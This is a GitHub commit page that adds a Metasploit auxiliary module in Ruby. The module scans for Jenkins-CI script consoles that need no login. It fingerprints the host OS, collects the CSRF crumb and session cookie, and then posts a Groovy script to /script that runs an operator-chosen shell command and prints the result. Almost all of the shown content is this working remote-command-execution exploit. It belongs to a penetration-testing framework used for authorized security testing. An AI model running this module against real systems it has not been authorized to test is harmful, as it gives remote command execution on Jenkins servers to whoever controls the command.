-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Grab zeroSteiner's module/jenkins-cmd branch
- Loading branch information
Showing
3 changed files
with
150 additions
and
8 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,142 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'rex/proto/http' | ||
require 'msf/core' | ||
require 'cgi' | ||
|
||
class Metasploit3 < Msf::Auxiliary | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Auxiliary::Scanner | ||
include Msf::Auxiliary::Report | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Jenkins-CI Unauthenticated Script-Console Scanner', | ||
'Description' => %q{ | ||
This module scans for unauthenticated Jenkins-CI script consoles and | ||
executes the specified command. | ||
}, | ||
'Author' => | ||
[ | ||
'altonjx', | ||
'Jeffrey Cap' | ||
], | ||
'References' => [ | ||
['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'], | ||
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'], | ||
], | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
register_options( | ||
[ | ||
OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ]), | ||
OptString.new('COMMAND', [ true, 'Command to run in application', 'whoami' ]), | ||
], self.class) | ||
end | ||
|
||
def fingerprint_os(ip) | ||
res = send_request_cgi({'uri' => "#{target_uri.path}systemInfo"}) | ||
|
||
# Verify that we received a proper systemInfo response | ||
unless res && res.body.to_s.length > 0 | ||
vprint_error("#{peer} - The server did not reply to our systemInfo request") | ||
return | ||
end | ||
|
||
unless res.body.index("System Properties") && | ||
res.body.index("Environment Variables") | ||
if res.body.index('Remember me on this computer') | ||
vprint_error("#{peer} This Jenkins-CI system requires authentication") | ||
else | ||
vprint_error("#{peer} This system is not running Jenkins-CI at #{datastore['TARGETURI']}") | ||
end | ||
return | ||
end | ||
|
||
host_info = {} | ||
if (res.body =~ /"\.crumb", "([a-z0-9]*)"/) | ||
print_status("#{peer} Using CSRF token: '#{$1}'") | ||
host_info[:crumb] = $1 | ||
|
||
sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0] | ||
host_info[:cookie] = "#{sessionid}" | ||
end | ||
|
||
os_info = pattern_extract(/os.name(.*?)os.version/m, res.body).first | ||
host_info[:prefix] = os_info.index(">Windows") ? "cmd.exe /c " : "" | ||
host_info | ||
end | ||
|
||
def run_host(ip) | ||
command = datastore['COMMAND'].gsub("\\", "\\\\\\") | ||
|
||
host_info = fingerprint_os(ip) | ||
return if host_info.nil? | ||
prefix = host_info[:prefix] | ||
|
||
request_parameters = { | ||
'uri' => "#{target_uri.path}script", | ||
'method' => 'POST', | ||
'ctype' => 'application/x-www-form-urlencoded', | ||
'vars_post' => | ||
{ | ||
'script' => "def sout = new StringBuffer(), serr = new StringBuffer()\r\ndef proc = '#{prefix} #{command}'.execute()\r\nproc.consumeProcessOutput(sout, serr)\r\nproc.waitForOrKill(1000)\r\nprintln \"out> $sout err> $serr\"\r\n", | ||
'Submit' => 'Run' | ||
} | ||
} | ||
request_parameters['cookie'] = host_info[:cookie] unless host_info[:cookie].nil? | ||
request_parameters['vars_post']['.crumb'] = host_info[:crumb] unless host_info[:crumb].nil? | ||
res = send_request_cgi(request_parameters) | ||
|
||
unless res && res.body.to_s.length > 0 | ||
vprint_error("#{peer} No response received from the server.") | ||
return | ||
end | ||
|
||
plugin_output, command_output = pattern_extract(/<pre>(.*?)<\/pre>/m, res.body.to_s) | ||
|
||
if plugin_output !~ /Jenkins\.instance\.pluginManager\.plugins/ | ||
vprint_error("#{peer} The server returned an invalid response.") | ||
return | ||
end | ||
|
||
# The output is double-HTML encoded | ||
output = CGI.unescapeHTML(CGI.unescapeHTML(command_output.to_s)). | ||
gsub(/\s*(out|err)>\s*/m, ''). | ||
strip | ||
|
||
if output =~ /^java\.[a-zA-Z\.]+\:\s*([^\n]+)\n/ | ||
output = $1 | ||
print_good("#{peer} The server is vulnerable, but the command failed: #{output}") | ||
else | ||
output.split("\n").each do |line| | ||
print_good("#{peer} #{line.strip}") | ||
end | ||
end | ||
|
||
report_vulnerable(output) | ||
|
||
end | ||
|
||
def pattern_extract(pattern, buffer) | ||
buffer.to_s.scan(pattern).map{ |m| m.first } | ||
end | ||
|
||
def report_vulnerable(result) | ||
report_vuln( | ||
:host => rhost, | ||
:port => rport, | ||
:proto => 'tcp', | ||
:sname => ssl ? 'https' : 'http', | ||
:name => self.name, | ||
:info => result, | ||
:refs => self.references, | ||
:exploited_at => Time.now.utc | ||
) | ||
end | ||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters